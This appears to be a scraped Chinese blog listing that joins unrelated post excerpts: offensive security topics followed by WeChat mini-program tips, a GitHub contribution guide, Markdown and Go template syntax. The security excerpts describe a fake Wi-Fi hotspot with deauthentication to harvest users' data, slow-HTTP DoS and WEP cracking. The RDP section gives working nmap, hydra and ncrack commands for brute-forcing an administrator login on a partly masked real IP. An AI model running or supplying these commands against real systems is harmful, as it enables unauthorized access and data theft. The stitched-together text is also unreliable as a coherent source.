创建假的wifi热点

本帖介绍怎么创建假的wifi热点,然后抓取连接到这个wifi用户的敏感数据。我们还会给周围的无线路由器发送未认证的包,使这些路由器瘫痪,强迫用户连接(或自动连接)我们创建的假wifi热点。

SlowHTTPTest-慢速DoS攻击

Slowhttptest是一个依赖于实际HTTP协议的Slow HTTP DoS攻击工具,它的设计原理是要求服务器所有请求被完全接收后再进行处理。

暴力破解Windows RDP(3389)

RDP是远程桌面协议。

$ nmap your_target
Starting Nmap 7.01 ( https://nmap.org ) at 2016-09-20 17:29 CST
Nmap scan report for ns514636.ip-192-95-xx.net (192.95.xx.xx)
Host is up (0.28s latency).
Not shown: 988 closed ports
PORT      STATE    SERVICE
135/tcp   filtered msrpc
139/tcp   filtered netbios-ssn
445/tcp   filtered microsoft-ds
593/tcp   filtered http-rpc-epmap
3389/tcp  open     ms-wbt-server   # 这个是远程桌面端口
4444/tcp  filtered krb524
6667/tcp  filtered irc
49152/tcp open     unknown
49153/tcp open     unknown
49154/tcp open     unknown
49155/tcp open     unknown
49163/tcp open     unknown
Nmap done: 1 IP address (1 host up) scanned in 28.14 seconds

使用hydra暴力破解:

hydra -t 4 -V -l administrator -P /usr/share/wordlists/rockyou.txt rdp://your_target

-t = TASKS run TASKS number of connects in parallel (per host, default: 16) RDP set to maximum of 4.
-V = Verbose shows you the attempted passwords.
-l = Username
-P = Password list
rdp:// = Port 3389

使用ncrack暴力破解:

ncrack -p 3389 -v -user administrator -P /usr/share/wordlists/rockyou.txt 192.95.xx.xx

-p = Port number
-v = Verbose shows you any found passwords in realtime
-user = username
-P = Password list

远程桌面登录:

rdesktop your_target

Kali Linux破解wifi密码(WEP)

WEP是无线路由器最初广泛使用的一种加密方式,这种加密方式非常容易被破解。

目前很少有人使用wep加密方式,但是还是会有。

小程序开发遇到的一些坑

小程序: 行家看看

年前,公司开发了微信小程序,我负责后端开发,其中遇到一些坑,分享一下

gh_7953b6350fad_258

小程序语音录制和播放

  1. 微信录音不能计时,需要自己计时
  2. 录音文件是微信独有格式,只能微信本身播放,否则需要工具转换为Mp3等通用格式才可以
  3. 录音播放不能直接用标签src引入,需要将语音文件下载到本地后才可以正常播放。
  4. 录音播放没有播放完成的事件,需要自己计时

小程序视频录制和播放

  1. 视频录制很费空间
  2. 视频需要压缩再上传,否则会很卡,或者上传失败
  3. 又拍云的视频处理文档是狗屎,直接问客服,否则处理回调不会成功
    目前就这些,想到了再写

大白话讲解如何给github上项目贡献代码

本文献给对git很迷茫的新手,注意是新手,但至少会点基本操作,有点基本概念的新手,我不会从怎么用github和git是什么开始讲的。如果作为新手你看书又看不进去,原理又太复杂,又没有直接了当告诉我们怎么给项目贡献代码,和项目同步代码的大体流程。于是我快速写了这么个东西。一来整理下自己混乱的思路,二来想号召大家一起用git开发点东西,可是好几个同鞋只会寂寞的给自己push。

markdown 语法汇总

Markdown是_什么_?

Markdown是一种轻量级标记语言,它以纯文本形式(易读、易写、易更改)编写文档,并最终以HTML格式发布。

golang模板语法

模板语法

with关键字

type u struct {
        Name string
        Age int
        Sex string
    }
    user:=&u{Name:"asd",Age:20,Sex:"mal"}
    data["user"]=user
    c.HTML(http.StatusOK, "index.html", data)

输出

    {{with .user}}
    {{.Name}};
    {{.Age}};
    {{.Sex}}
    {{end}}

循环打印数组

nums := []int{1,2,3,4,5,6,7,8,9,0}
data["nums"]=nums

输出

    {{range .nums}}
    {{.}}
    {{end}}

高级使用-模板变量

data["abc"] = "helloword-abc"
    c.HTML(http.StatusOK, "index.html", data)

模板变量示例